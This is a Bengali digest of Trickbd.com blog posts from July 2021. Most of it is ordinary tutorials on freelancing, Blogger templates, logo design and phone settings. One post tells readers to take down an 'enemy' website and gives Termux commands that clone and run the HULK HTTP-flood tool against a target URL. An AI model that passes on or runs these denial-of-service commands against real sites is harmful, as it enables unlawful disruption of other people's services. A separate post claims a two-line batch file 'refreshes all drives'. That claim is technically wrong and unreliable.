ফ্রিল্যান্সিং বিষয়ে কিছু প্রশ্ন এবং উত্তর |
- ফ্রিল্যান্সিং বিষয়ে কিছু প্রশ্ন এবং উত্তর
- [AkLogic-6] Facebook এর মত সামাজিক সাইট তৈরি করুন খুব সহজে। না দেখলে অনেক বড় একটা মিস করবেন (A – Z)
- [AkLogic-5] হয়েজান গ্রাফিক ডিজাইনার, এখন আপনিও একটি App দিয়ে প্রফেশনাল দের মতো পোস্টার বানানো শিখুন।
- [AK Logic-2] আপনার শত্রুর ওয়েবসাইট কে Ultra Halk Attack দিয়ে, শত্রুর webserver Down করে দিন ☠☠(with prove)
- [Ak Logic-4]এবার আপনার কম্পিউটার Auto Refresh করুন কনো রকম Software ছারাই
- একদম ফ্রিতে ডাউনলোড করে নিন Helio Responsive প্রিমিয়াম ব্লগার টেমপ্লেট Without Footer Credit
- মোবাইল দিয়ে খুব সহজেই আপনার ইউটিউব চ্যানেলের জন্য সুন্দর একটি লোগো তৈরি করুন
- একদম ফ্রিতে ডাউনলোড করে নিন Palki 2 Responsive প্রিমিয়াম ব্লগার টেমপ্লেট
- এখন থেকে আপনার মোবাইলে কম্পিউটারের মত মাউস ব্যবহার করুন কোন অ্যাপ ছাড়া
- এখন থেকে মোবাইলে রেকর্ড করুন স্টুডিওর মত কন্ঠ আগের তুলনায় অনেক সুন্দর হবে
ফ্রিল্যান্সিং বিষয়ে কিছু প্রশ্ন এবং উত্তর Posted: বর্তমান ইন্টারনেটের জগতে গোটা বিশ্ব একটা ঐতিহাসিক সময় পার করছে । অনলাইনের জগত থেকে বর্তমানে অনেক দেশের যুবসমাজ আয় করছেন । তারা হয়েছেন আর্থিক ভাবে স্বাবলম্বি । আমাদের দেশও এর ব্যতিক্রম নয় । বাংলাদেশের প্রায় পাঁচ লাখ ফ্রিল্যান্সার দেশের মাটিতে বসে বিদেশের ১০০ মিলিয়ন মার্কিন ডলার আয় করছে । (সূত্রঃ বাংলাদেশ প্রতিদিন ।০২/০৭/২০২১) । সারা বিশ্ব জুড়ে প্রায় ১.১ বিলিয়ন ফ্রিল্যান্সার রয়েছেন । যারা আয় করছেন মিলিয়ন, বিলিয়ন ছাড়িয়ে কয়েক ট্রিলিয়ন । (সূত্রঃ ddiy.co) এরপরেও আমাদের মধ্যে অনেক মানুষের ভ্রান্ত ধারণা রয়েছে এই ফ্রিল্যান্সিং বিষয়টি নিয়ে । আমাদের দেশের অনেক মানুষ ফ্রিল্যান্সিং এর কথা শুনলে তেমন একটা গুরুত্ব দেন না । কিন্তু তাঁরা জানেন না যে, একজন প্রথম শ্রেণীর কর্মকর্তা যে স্যালারি পান, তার থেকে অন্তত দশগুণ অর্থ একজন ফ্রিল্যান্সার উপার্জন করতে পারেন । বর্তমানে আমাদের সমাজে ফ্রিল্যান্সিং বিষয় নিয়ে যে বিরূপ কিছু প্রশ্ন প্রচলিত রয়েছে । আজকের আলোচনায় সেগুলোর উত্তর দেওয়ার চেষ্টা করব । প্রশ্নঃ সব জায়গায় ব্যর্থ হয়ে শেষে ফ্রিল্যান্সিং,কেন?উত্তরঃ অনেকেই পড়ালেখা কিংবা অন্য কিছু করতে ব্যর্থ হচ্ছেন । প্রকৃতপক্ষে কোন কিছু করার ব্যাপারে তারা খুবই অলস, আর সে কারণেই ক্যারিয়ার সাজাতে পারছেন না । আর এরকম কিছু মানুষও ফ্রিল্যান্সিং নিয়ে সফল হওয়ার চিন্তা করে থাকেন । কিন্তু সেটা হয়ে ওঠে না । ফ্রিল্যান্সিংয়ের ক্ষেত্রে অযোগ্যদের জায়গা নেই । যত বেশি যোগ্যতা অর্জন করবেন, অনলাইনে আপনার আয় ততই বৃদ্ধি পাবে । যোগ্যতা ছাড়া হয়তো সাময়িক ভাবে পাঁচ-দশ হাজার টাকা আয় করতে পারবেন । এক কথায় বলতে হয়, ফ্রিল্যান্সিংয়ে সফল হতে গেলে অবশ্যই যোগ্যতার দরকার আছে । প্রশ্নঃ ফ্রিল্যান্সিং মানেই কি আপওয়ার্কে কাজ করা?উত্তরঃ সারা বিশ্বের যত কাজ আউটসোর্সিং এর মাধ্যমে পাওয়া যায় বা আউটসোর্সিং এর মাধ্যমে কাজ করানো হয়, তার মাত্র ৭ শতাংশ কাজ মার্কেটপ্লেসগুলোতে পাওয়া যায় । শুধুমাত্র আপওয়ার্কে নয়, আপওয়ার্ক, ফাইবার, পিপল পার আওয়ার, ৯৯ ডিজাইন, এনভাটো, মাইক্রোওয়ার্কারস, ক্লিকব্যাংক, অ্যামাজন ইত্যাদি । মার্কেটপ্লেসের এই ৭ শতাংশ কাজ বাদ দিলে আরো ৯৩ শতাংশ কাজ থাকে । এই কাজগুলো সম্পূর্ণ মার্কেটপ্লেসের বাইরেই হয়ে থাকে । যারা মনে করেন ফ্রিল্যান্সিং মানেই আপওয়ার্ক, তাদের বলবো এই ৯৩ শতাংশ কাজের ব্যাপারে খোঁজ-খবর নিন । প্রশ্নঃ ফ্রিল্যান্সিং করতে গেলে কি অল্প যোগ্যতাই যথেষ্ট?উত্তরঃ ফ্রিল্যান্সিং জায়গাটা শুধুমাত্র যোগ্য ব্যক্তিদের জন্য । কারণ কোনো ক্রেতা তার কাজ করানোর জন্য সারা বিশ্বের অনেক ফ্রিল্যান্সারদের মধ্য থেকে সেরা কাউকে বাছাই করে নেওয়ার সুযোগ পেয়ে থাকেন । সুতরাং যাদের যোগ্যতা কম তাদের তখন কাজ না পাওয়ার সম্ভাবনা বেশি থাকে । ফ্রিল্যান্সিং এর শুরুতে প্রচুর সময় এবং পরিশ্রম করে নিজেকে যোগ্য হিসেবে প্রতিষ্ঠিত করতে হবে । এরপরই ফ্রিল্যান্সিং কাজে সফলতা পাওয়া যাবে । প্রশ্নঃ ফ্রিল্যান্সিং করার জন্য কি অনেক গুণের অধিকারী হতে হয়?উত্তরঃ যারা অনলাইনে ফ্রিল্যান্সিং করার জন্য আসেন এবং খোঁজ খবর নিয়ে দেখেন যে, যারা ফ্রিল্যান্সিং করে অনলাইনে আয় করছেন তাদের মত যোগ্যতা নতুনদের নেই । তারা অনেকেই ভেবে থাকেন এই পর্যায়ে পৌঁছানো তারপর সম্ভাব না– এ ধারণা থেকেই অনেকে পিছিয়ে পড়েন এবং এক পর্যায়ে ফ্রিল্যান্সিং সেক্টর থেকে পিছিয়ে আসেন । আমি তাদের উদ্দেশ্যে বলব, যারা এই মুহূর্তে সফলভাবে অনলাইনে আয় করছেন, তারাও একসময় খুবই সাধারন ছিলেন । পরিশ্রম এবং প্রশিক্ষণ তাদের আজকের অবস্থানে নিয়ে এসেছে । কেউ যদি কাজ শিখে নেন এবং প্রচুর পরিশ্রম করেন তাহলে অনেকেই অনলাইনে সফল হতে পারবেন । প্রশ্নঃ ফ্রিল্যান্সিংকে পার্ট টাইম নাকি ফুলটাইম নেওয়া উচিত?উত্তরঃ আমাদের দেশে এখনো অনেকেই ফ্রিল্যান্সিং বিষয়টাকে চাকরির বিকল্প ভাবতে পারছেন না । চাকরি কিংবা লেখাপড়ার পাশাপাশি পার্টটাইম হিসাবেই ফ্রিল্যান্সিংকে এখন সবাই ভাবছেন । আর সে কারণেই ফ্রিল্যান্সিংয়ের মাধ্যমে আমাদের দেশে যে পরিমাণ আয় করা সম্ভব সেটি বাস্তবে পরিণত হচ্ছে না । ফ্রিল্যান্সিং শুধুমাত্র অতিরিক্ত টাকা আয়ের মাধ্যম নয় । ফ্রিল্যান্সিংকে অবশ্যই চাকরির বিপরীতে ক্যারিয়ার হিসেবে নেওয়া সম্ভব । কারণ ফ্রিল্যান্সার হিসাবে মূলত উন্নত দেশের কোনো কোম্পানির হয়েই কাজ করছেন । অনেকেই আবার অন্য কোম্পানির নিয়মিত কর্মচারী হিসেবে এদেশের মাটিতে বসেই চাকরিও করছেন । প্রশ্নঃ ফ্রিল্যান্সিংয়ের ক্ষেত্রে আয় কি অনিশ্চিত ?উত্তরঃ চাকরির ক্ষেত্রে কম টাকা হলেও মাস শেষে নিশ্চিতভাবে হাতে টাকা আসে । কিন্তু ফ্রিল্যান্সিংয়ের ক্ষেত্রে চাকরির বেতনের থেকেও ৫-১০ গুন আয় হওয়ার পরও এদেশের পরিবারগুলো ফ্রিল্যান্সিং থেকে আয় করতে বাধা দিয়ে থাকে । তাদের বদ্ধমূল ধারণা- একসময় ফ্রিল্যান্সিংয়ের আয় বন্ধ হয়ে যেতে পারে । ধরুন, কোন একজন মার্কেটিংয়ের কাজ করে অনলাইনে আয় থেকে আয় করেন । তাহলে তার এক সময় কোনো কাজ থাকবে না, এর মানে দাঁড়ায় পৃথিবীতে আর কোন প্রতিষ্ঠানের মার্কেটিংয়ের প্রয়োজন নেই । সেটি যদি হয়ে থাকে তাহলে দেশের ভেতরেও যারা মার্কেটিং এর কাজ করেন, তারাও বেকার হয়ে পড়বেন । কোন সেক্টর হিসাব করলে লোকাল পর্যায়ে যদি চাকরির সুযোগ থাকে ১০০ প্রতিষ্ঠানে, তাহলে অনলাইনে চাকরির সুযোগ থাকবে ১ লাখ প্রতিষ্ঠানে । কারণ অনলাইনে সারাবিশ্বের সব প্রতিষ্ঠানেই আপনার চাকরি করার সুযোগ থাকছে । প্রশ্নঃ ফ্রিল্যান্সিং এ কাজ করতে গেলে ইংরেজি জানাটা কি জরুরী?উত্তরঃ অবশ্যই জরুরী । কারণ অনেকেই অনেক কাজের ক্ষেত্রে ভালো দক্ষতা থাকার পরও ইংরেজিতে দুর্বল হওয়ার কারণে ফ্রিল্যান্সিংয়ে ভালো করতে পারেন না । অনলাইনে কাজের ক্ষেত্রে দক্ষতা সবথেকে বেশি গুরুত্ব দেন বায়ার/ ক্লায়েন্টরা । সে ক্ষেত্রে বায়ার/ ক্লায়েন্ট কাজ বুঝিয়ে দেওয়ার সময় যদি দেখেন ফ্রিল্যান্সার ভাষার দুর্বলতার কারণে কাজ সঠিকভাবে বুঝে নিতে পারছেন না কিংবা ফ্রিল্যান্সার বায়ার/ ক্লায়েন্টকে কাজ বুঝিয়ে দেওয়ার ক্ষেত্রে তার ভাষা বুঝতে তার জন্য কষ্টসাধ্য হয় বা হচ্ছে, তখন বায়ার/ ক্লায়েন্ট কিছুটা বিরক্ত বোধ করেন । সে ক্ষেত্রে কাজে দক্ষ থাকলে অনেক সময় বায়ার/ ক্লায়েন্ট ভাষার দুর্বলতাকে বিবেচনা করেন । তবে ফ্রিল্যান্সিংয়ে কাজ করতে গেলে অবশ্যই ইংরেজিতে পারদর্শী হওয়াটা জরুরী । প্রশ্নঃ লেখাপড়া না জেনেও ফ্রিল্যান্সিং করা যাবে?উত্তরঃ সবকিছুর জন্যই লেখা পড়ার দরকার আছে । শিক্ষিত ব্যক্তির জ্ঞানের পরিধি একজন অশিক্ষিত ব্যক্তির থেকে অনেক বেশি উন্নত হবে এটাই স্বাভাবিক । যদিও শুধু চাকরি করার জন্য লেখাপড়া করতে হয়, এরকম একটি ভুল আমাদের দেশে প্রচলিত রয়েছে । আপনি যদি লেখাপড়া না জানেন, তাহলে ফ্রিল্যান্সিংয়ের ক্ষেত্রে উন্নততর প্রশিক্ষণ কিভাবে নিবেন? ফ্রিল্যান্সিংয়ে কাজ করতে গেলে প্রতিনিয়ত প্রশিক্ষণের দরকার হয় এজন্য প্রচুর পরিমাণ পড়াশোনা করতে হয় । শুধুমাত্র কোনো একটি বিষয়ে পারদর্শী হলেই চলবে না । এজন্য অবশ্যই আপনাকে লেখাপড়া জানতে হবে । প্রশ্নঃ ফ্রিল্যান্সিং করার জন্য কতদিনের প্রস্তুতি নিতে হয়?উত্তরঃ ফ্রিল্যান্সিং করার জন্য যে বিষয়টি আপনি বেছে নিয়েছেন, সেটি খুব ভালোভাবে দক্ষ হওয়া ছাড়া কাজ করে প্রচুর পরিমানে আয় করার সম্ভাবনা কম থাকে । আর ভালো ভাবে দক্ষ হওয়ার জন্য অবশ্যই ট্রেনিং নেওয়ার পাশাপাশি সেটি প্রচুর পরিমাণে প্র্যাকটিস করার জন্য সময় দেওয়া দরকার । এ বিষয়ে অভিজ্ঞরা বলে থাকেন, মাসে ২০ হাজার টাকার চাকরি পাওয়ার জন্য স্কুল, কলেজ, ভার্সিটিতে যদি ২০ বছর ব্যয় করতে হয়, তাহলে অনলাইনে আউটসোর্সিং এর মাধ্যমে ৫০ হাজার টাকা আয় করার জন্য কমপক্ষে ছয় মাস থেকে এক বছর সময় ব্যয় করার মত ধৈর্য থাকাটা আবশ্যক । প্রশ্নঃ ট্রেনিং সেন্টারে কোর্স না করলে ফ্রিল্যান্সার হওয়া যায় না?উত্তরঃ অবশ্যই যায় । বর্তমানে অনলাইনে বিভিন্ন ব্লগে, ইউটিউবে এখন প্রচুর ভিডিও টিউটোরিয়াল আছে । ইচ্ছা থাকলে সেগুলো দেখে দেখে ঘরে বসেই সবকিছু শিখে অনলাইনে ক্যারিয়ার গড়া সম্ভব । বর্তমানে বাংলাতেই অনেক ভালো তথ্য-উপাত্ত পাওয়া যাচ্ছে, যা কাজ শুরু করার জন্য যথেষ্ট । তবে এটা সত্য, নিজে নিজে সেগুলো পড়ে শিখতে গেলে পরিশ্রম এবং সময় অনেক বেশি লাগে । যদি একটা কোর্স করে যথাযথ কাজের নির্দেশনা পাওয়া যায় তাহলে সে কাজ করা অনেক সহজ হবে । প্রশ্নঃ সাইন্সের স্টুডেন্ট না হলে ফ্রিল্যান্সিং করা যায় না?উত্তরঃ অবশ্যই যায় । অনলাইনে ক্যারিয়ারের সাথে অ্যাক্যাডেমিক ব্যাকগ্রাউন্ডের কোন ধরনের সম্পর্ক নেই । মানবিক কিংবা বাণিজ্য অথবা সাইন্স যে কোন বিভাগের যে কেউ অনলাইনে কাজের দক্ষতা অর্জন করে সেগুলোর মাধ্যমে ফ্রিল্যান্সিং করে সফল হতে পারবেন । বর্তমান অনলাইনের যুগে যারা এখনো বেকার অবস্থায় রয়েছেন, তাদের উদ্দেশ্যে আমি বলবো আপনারা অনলাইনে কাজের ক্ষেত্রগুলোতে কর্ম খোজার চেষ্টা করুন । নিজেকে স্ব-উদ্যোগী হয়ে স্বাবলম্বী করুন । আপনি হয়তো জানেন না যে আমাদের পাশের দেশ ভারত এবং পাকিস্তানের প্রচুর যুবক ফ্রিল্যান্সিং করে আজ তারা স্বাবলম্বী । ফ্রিল্যান্সিংয়ের ক্ষেত্রে আমাদের দেশও যে পিছিয়ে আছে তা নয় । আমাদের দেশের অনেক যুবক ফ্রিল্যান্সিং করে আজ স্বাবলম্বী । সমাজে তাদের মান মর্যাদাও অনেক উঁচুতে । তাই আপনাদের বলব, আর বেকারত্ব নয় কাজ শিখুন, ফ্রিল্যান্সিংয়ের মাধ্যমে স্বাবলম্বী হন । আল্লাহ হাফেজ ।। The post ফ্রিল্যান্সিং বিষয়ে কিছু প্রশ্ন এবং উত্তর appeared first on Trickbd.com. |
[AkLogic-6] Facebook এর মত সামাজিক সাইট তৈরি করুন খুব সহজে। না দেখলে অনেক বড় একটা মিস করবেন (A – Z) Posted: 09 Jul 2021 09:26 PM PDT আজকাল আমরা সবাই ফেসবুক এর সাথে পরিচিত। ফেসবুক আমরা সবাই জানি অনেক বড় একটা সাইট, এই ধরনের সাইট তৈরি করতে অনেক কঠিন একটা বেপার, এই সাইট শুধু তারাই তৈরি করতে পারে যারা প্রফেশনাল WebDeveloper। কিন্তু আজকে আপনাদের সবাইকে ভুল প্রমান করে ছারবো। আজকে যেই পোস্ট টি শেয়ার করব তা দিয়ে ছোট বাচ্চা রাও Facebook এর মত সাইট তৈরি করতে পারবে। মূলপোস্ট: প্রথমে এইলিংকে এ গিয়ে রেজিস্টার করে নিন এবং নিচের মত করে আপনার তথ্য দিয়ে। তার পরে আপনার ডমিন নেম, আর Discription দিয়ে create now এ ক্লিক করুন। তারপরে preset নামে Option সিলেক্ট করে Go তে ক্লিক করুন।
তো এখানেই শেষ করছি। সবাই ভালো থাকবেন সুস্থ থাকবেন এবং ভাইরাস থেকে মুক্ত থাকবেন The post [AkLogic-6] Facebook এর মত সামাজিক সাইট তৈরি করুন খুব সহজে। না দেখলে অনেক বড় একটা মিস করবেন (A – Z)🔵 appeared first on Trickbd.com. |
[AkLogic-5] হয়েজান গ্রাফিক ডিজাইনার, এখন আপনিও একটি App দিয়ে প্রফেশনাল দের মতো পোস্টার বানানো শিখুন। Posted: 09 Jul 2021 09:25 PM PDT বিসমিল্লাহ্ রহমানীর রহিমআশা করি সবাই ভালো আছেন। আপনাদের মাঝে অনেক ব্যস্ততার মাঝে হাজির হলাম আমি Ak Logic | ওরফে Web Akash । যাই হই না কেন মূল কথা আমি একজন TrickBD.Com এর সদস্য । মূলকথা: Graphics পোস্টার বানোর জন্য আপনাদের একটা অ্যাপ লাগবে | নিচের থেকে ডাউনলোড করে ইন্সটল করেন ।
ইন্সটল শেষ হয়ে গেলে অ্যাপটি ওপেন করুন ।ওপেন হয়ে গেলে কাজ শুরু করে দিন । নিচে কিছু screenshot দেওয়া হল । ………SC……… বিদ্রঃ এই পোস্ট টি তাদের জন্য যারা photoshope এর কোন কাজ পারেন না তাদের জন্য বড় ভাইয়েরা আমি আপনাদের থেকে আমি অনেক ছোট তাই কোন ভুল হলে ক্ষমার চোখে দেখবেন। এবং লাইক , শেয়ার করুন না বুঝলে দয়া করে কমেন্ট করুন ।আর TricBD এর সাথেই থাকুন ।আল্লাহহাফেজ
The post [AkLogic-5] হয়েজান গ্রাফিক ডিজাইনার, এখন আপনিও একটি App দিয়ে প্রফেশনাল দের মতো পোস্টার বানানো শিখুন। appeared first on Trickbd.com. |
Posted: 09 Jul 2021 09:24 PM PDT আসসালামু আলাইকুম আশা করি সবাই ভালো আছেন,আর আপনাদের দোয়ায় আমিও ভালো আছি। চলুন কথা না বাড়ি কাজে নেমে পড়ি কারন আপনারা টাইটেল দেখেই বুঝতে পেরেছেন,হ্যা বন্ধুরা আপনিও এখন শত্রুর ওয়েবসাইটকে Dos Attack দিতে পারবেন…যারা জানেন না Doos Attac কি? এখানে ক্লিক করে যেনে নিতে পারেন। তো Dos Attack দিতে হলে নিচে দেওয়া অ্যাপ টি লাগবে,,, অ্যাপ টি ওপেন করে নিচের দেখানো অনুযায়ী কাজ করুন↓ apt update && apt upgrade apt install git apt install python2 git clone https://github.com/grafov/hulk cd hulk chmod +x * python2 hulk.py victim weblink (victim weblink link এর জাগাই আপনার শত্রুর link দিয়ে Enter চাপুন) বিঃদ্রঃ সব ওয়েব সাইট এই ভাবে attack হবে না যেমন : trickbd.com,,, Trickbd High security server ব্যবহার করে থাকে।….. আমাকে পরোবর্তীতে নতুন নতুন পোষ্ট দিতে উৎসাহিত করবেন. সবাইকে ধন্যবাদ।আজকের মতো এখানেই বিদায় নিলাম,হাজির হবো আরও নিত্য নতুন টিপস নিয়ে আমি Ak LogicThank You. আল্লাহ হাফেজ। The post [AK Logic-2]💀 আপনার শত্রুর ওয়েবসাইট কে Ultra Halk Attack দিয়ে, শত্রুর webserver Down করে দিন 🏴☠🏴☠(with prove) appeared first on Trickbd.com. |
[Ak Logic-4]এবার আপনার কম্পিউটার Auto Refresh করুন কনো রকম Software ছারাই Posted: 09 Jul 2021 09:23 PM PDT Welcome To Trickbdআজকের বিষয় : আপনার PC \Laptop কে কি ভাবে কোন রকম Software ছারাই Refresh করবেন । তাও আবার আটো Refresh হবে সকল Drive গুলো। আজকারল আমারা সবাই Refresh এর সাথে পরিচিত । মাউচ এর রাইট বাটন ক্লিক করেলে Refresh Optaion টি আসে । আসলে আমরা যেই Refresh করি তা সুধু C Drive Refresh হয় ,আজকে যেই পোস্ট টি সেয়ার করব তা দিয়ে আপনি আপনার লেপটপ এর সকল Drive Refresh করতে পারবেন , তো কাজ টি শুরু করা যাক ………। প্রথমে আমাদের কে মাইচ এর রাইট বাটন ক্লিক করে text Document নিতে হবে নিচের মত করে … তার পরে এই text Document ওপেন করব এবং সেই text Document এই Format টি লিখতে হবে নিচের মত করে … Echo off F: তার পর এটিকে আমারা save asএ কিল্ক করে নিচের মত করে নাম দিয়ে সেভ করে নিব Refresh.bat তার পরে bat ফাইলটি ওপেন করুন …… এখন দেখুন খেলা শুরু হয়ে গেছে আপনার সকল ড্রাইভ গিলো Refresh হচ্ছে । আশা করছি ট্রিক টি আপনাদের ভাল লেগেছে। *কোনো সমস্যা ফেস করলে কমেন্ট এ জানান অবশ্যই রিপ্লাই করে সমাধান দেওয়ার চেষ্টা করব।
সকলের সুস্থতা কামনায় এখানেই শেষ করছি। The post [Ak Logic-4]এবার আপনার কম্পিউটার Auto Refresh করুন কনো রকম Software ছারাই appeared first on Trickbd.com. |
একদম ফ্রিতে ডাউনলোড করে নিন Helio Responsive প্রিমিয়াম ব্লগার টেমপ্লেট Without Footer Credit Posted: 09 Jul 2021 09:22 PM PDT আসসালামু আলাইকুমবন্ধুরা সবাই কেমন আছেন। আশা করি সবাই অনেক ভাল আছেন। কারণ আমাদের সাথে থাকলে সবাই ভালই থাকে। আর আপনাদের দোয়ায় আমি অনেক ভালো আছি বন্ধুরা আজকে আপনাদের জন্য নিয়ে আসলাম মুভি ডাউনলোড সাইটের অসাধারন একটি ব্লগার টেম্পলেট নিয়ে। যারা ভাবতেছেন ব্লগার একটি মুভি ডাউনলোড সাইট বানাবেন তারা অবশ্যই এই টেমপ্লেটটি ইউজ করতে পারেন। কারণ এই টেমপ্লেটটি তে রয়েছে অসাধারণ সকল ফিচার যা আপনার সাইটকে সুন্দর এবং আকর্ষণীয় করে তুলবে। রয়েছে ফুল রেস্পন্সিভ স্টাইল যাতে করে সকল ডিভাইসে সহজেই সাপোর্ট করে এবং সহজে Browse করা যায়। রয়েছে Google PageSpeed Insights সিস্টেম যাতে আপনার সাইট গুগলে এ খুব তাড়াতাড়ি Rank করে এবং আপনার সাইটের স্পিড বেশি ফাস্ট থাকে। রয়েছে ফাস্ট লোডিং সিস্টেম যাতে আপনার সাইটের সকল কিছু তাড়াতাড়ি Show করে। Adsense রেডি সিস্টেম যাতে আপনি গুগোল অ্যাডসেন্সের এড লাগিয়ে আপনার সাইট থেকে ইনকাম করতে পারেন। রয়েছে Easy Admin Panel সিস্টেম যাতে খুব সহজেই আপনি আপনার সাইট কে কাস্টমাইজ করতে পারেন এবং সুন্দর ও আকর্ষণীয় করে তুলতে পারেন। রয়েছে সোশিয়াল শেয়ার বাটন যাতে আপনি খুব সহজেই আপনার পোষ্ট গুলোকে বিভিন্ন সোশ্যাল মিডিয়াতে শেয়ার করতে পারেন। রয়েছে Related Posts সিস্টেম যাতে আপনার সাইটের ভিজিটর আপনার সাইট এর প্রতি আকর্ষণ বাড়ে। এবং আরো অনেক ভাল ভাল ফিচার রয়েছে নিচ থেকে Template এর কিছু Features দেখে নিন। কিছু স্ক্রীনশট দেখুন:Features Of Template:Full Responsive Design Mobile Friendly Google PageSpeed Insights Fast Loading Schema Ready SEO Friendly Adsense Easy Admin Panel Unlimited home layout box Unlimited Colors Social Share Buttons Related Posts Well Documentatio Google Comment Author Box Drop Down Menu And Much More…. Premium Features : উপরে ফিচারগুলো দেখে যদি আপনার কাছে Template টি ভালো লাগে তাহলে নিচ থেকে ডাউনলোড করে নিন Demo দেখুনTemplate টি ডাউনলোড করুনআশা করি পোস্টটি আপনাদের কাছে ভাল লেগেছে যদি ভালো লাগে তাহলে অবশ্যই একটি লাইক দিবেন এবং কমেন্ট করে আপনার মতামত জানাবেন ধন্যবাদ সবাইকে পোস্টটি পড়ার জন্য। সবাই ভাল থাকবেন সুস্থ থাকবেন ট্রিকবিডি সাথেই থাকবেন। The post একদম ফ্রিতে ডাউনলোড করে নিন Helio Responsive প্রিমিয়াম ব্লগার টেমপ্লেট Without Footer Credit appeared first on Trickbd.com. |
মোবাইল দিয়ে খুব সহজেই আপনার ইউটিউব চ্যানেলের জন্য সুন্দর একটি লোগো তৈরি করুন Posted: 09 Jul 2021 09:22 PM PDT আসসালামু আলাইকুমবন্ধুরা সবাই কেমন আছেন? আশা করি সবাই অনেক ভাল আছেন আল্লাহর রহমতে। আর আপনাদের দোয়ায় আমি অনেক ভালো আছি বন্ধুরা আজকে আপনাদেরকে দেখাবো কিভাবে আপনার মোবাইল দিয়ে খুব সহজে আপনার ইউটিউব চ্যানেলের জন্য একটি সুন্দর লোগো তৈরি করবেন একটা ইউটিউব চ্যানেল Create করার পর চ্যানেলটা কে সুন্দর করার জন্য প্রথমেই দরকার একটা সুন্দর লোগো তো আজকের পোস্টে আপনাদেরকে আমি সম্পুর্ন বিস্তারিত বলবো সম্পূর্ণ পোস্টটা ভালো করে দেখবেন তো বেশি কথা না বলে চলুন সরাসরি পোস্টে চলে যায় চলুন তাহলে শুরু করা যাক :প্রথমে নিচ থেকে Font এবং ইমেজ টি ডাউনলোড করে নিন Font ডাউনলোড করুনImage ডাউনলোড করুনডাউনলোড করার পর আপনার মোবাইলে Pixellab অ্যাপটি ইন্সটল করে নিবেন ইন্সটল করার পর ওপেন করবেন ওপেন করার পর এরকম একটা Text আসবে Text উপর ক্লিক করবেন আশা করি আপনাদেরকে বুঝাতে পারছি ধন্যবাদ সবাইকে পুরো পোস্টটা পড়ার জন্য সবাই ভাল থাকবেন সুস্থ থাকবেন ট্রিকবিডির সাথেই থাকবেন The post মোবাইল দিয়ে খুব সহজেই আপনার ইউটিউব চ্যানেলের জন্য সুন্দর একটি লোগো তৈরি করুন appeared first on Trickbd.com. |
একদম ফ্রিতে ডাউনলোড করে নিন Palki 2 Responsive প্রিমিয়াম ব্লগার টেমপ্লেট Posted: 09 Jul 2021 09:21 PM PDT আসসালামু আলাইকুমবন্ধুরা সবাই কেমন আছেন। আশা করি সবাই অনেক ভাল আছেন। কারণ ট্রিকবিডি সাথে থাকলে সবাই ভালই থাকে। আর আপনাদের দোয়ায় আমি অনেক ভালো আছি বন্ধুরা আজকে আপনাদের জন্য নিয়ে আসলাম অসাধারণ একটি প্রিমিয়াম ব্লগার টেমপ্লেট । এই টেমপ্লেটটির নাম হল Palki 2 এটা সম্পূর্ণ প্রিমিয়াম ভার্সন রয়েছে প্রিমিয়াম সকল ফিচার । যারা ব্লগিং করতে চান তারা এই টেমপ্লেটটি ইউজ করতে পারেন কারণ এতে অনেক ভাল ভাল ফিচার রয়েছে। এ টেমপ্লেটটি ফুল রেস্পন্সিভ স্টাইল করে তৈরি করা হয়েছে যাতে সকল ডিভাইসে খুব সহজেই সাপোর্ট করে । রয়েছে অ্যাডসেন্সে উইজেট সিস্টেম যাতে আপনি খুব সহজেই গুগল এডসেন্স এর বিজ্ঞাপন আপনার সাইটে বসাতে পারেন। রয়েছে Seo Ready সিস্টেম যাতে আপনার সাইট খুব সহজে গুগোল বা বিভিন্ন সার্চ ইঞ্জিনে খুব তাড়াতাড়ি রেংক করে। রয়েছে অসাধারণ স্টাইলিশ সার্চ বক্স আপনার সাইটকে সুন্দর ও আকর্ষণ করে তুলবে। আরো রয়েছে Simple and Easy Admin Panel যাতে আপনি খুব সহজেই আপনার সাইটকে ভালোভাবে কাস্টমাইজ করতে পারেন। টেমপ্লেট টি তে রয়েছে অসাধারণ স্টাইলিশ সোসিয়াল আইকন উইজেট সিস্টেম জাপান সাইকেল সুন্দর এবং আকর্ষণীয় করে তুলবে। রয়েছে সোশ্যাল শেয়ার বাটন আপনি খুব সহজেই আপনার সাইটের বা ব্লগের পোস্টগুলো বিভিন্ন সোশ্যাল মিডিয়াতে শেয়ার করতে পারেন। এবং আরো অনেক ভালো ভালো ফিচার রয়েছে টেমপ্লেটটিতে কিছু স্ক্রীনশট দেখুন:Palki 2 Free Features :-Fully Responsive Design SEO Optimized Testing Tool Validator( Pro Only) Easy Admin Panel Numbered Page Navigation Breadcrumbs Related Posts Drop down menu Social Icons Unlimited Colors Ads Ready Social Share Buttons Google Comment Search Box Custom 404 Error page Much more… Palki 2 Premium Features :-Lifetime Premium Support No Encrypted Scripts Lifetime Template Updatesll Remove Footer credits One Time Payment For Unlimited Domains And Much More… উপরে ফিচারগুলো দেখে যদি আপনার কাছে Template টি ভালো লাগে তাহলে নিচ থেকে ডাউনলোড করে নিন Demo দেখুনTemplate টি ডাউনলোড করুনআশা করি পোস্টটি আপনাদের কাছে ভাল লেগেছে যদি ভালো লাগে তাহলে অবশ্যই একটি লাইক দিবেন এবং কমেন্ট করে আপনার মতামত জানাবেন ধন্যবাদ সবাইকে পোস্টটি পড়ার জন্য। সবাই ভাল থাকবেন সুস্থ থাকবেন ট্রিকবিডি সাথেই থাকবেন। The post একদম ফ্রিতে ডাউনলোড করে নিন Palki 2 Responsive প্রিমিয়াম ব্লগার টেমপ্লেট appeared first on Trickbd.com. |
এখন থেকে আপনার মোবাইলে কম্পিউটারের মত মাউস ব্যবহার করুন কোন অ্যাপ ছাড়া Posted: 09 Jul 2021 09:20 PM PDT আসসালামু আলাইকুমবন্ধুরা সবাই কেমন আছেন। আশা করি সবাই অনেক ভাল আছেন। কারণ ট্রিকবিডি সাথে থাকলে সবাই ভালই থাকে। আর আপনাদের দোয়ায় আমি অনেক ভালো আছি আজকে আপনাদেরকে দেখাব কিভাবে আপনার মোবাইলে কোন অ্যাপ ছাড়া কম্পিউটারের মত আপনার মোবাইলে মাউস ব্যবহার করবেন এই Tricks হয়তো অনেকেই জানেন তবে যারা জানে না তাদের জন্য অনেক উপকার হবে বলে শেয়ার করেছি তো বেশি কথা না বলে চলুন সরাসরি মুল পোস্টে চলে যাই চলুন তাহলে শুরু করা যাক:প্রথমে আপনার মোবাইলের সেটিং এর উপর ক্লিক করুন সেটিং এ আসার পর এরকম ইন্টারফেস আসবে আপনারা slide down করে একটু নিচে চলে যাবেন তারপর এখান থেকে Accessibility এর উপর ক্লিক করুন তারপর এখান থেকে Dexterity and Interaction এর উপর ক্লিক করুন তারপর এখান থেকে Assistant Menu এর 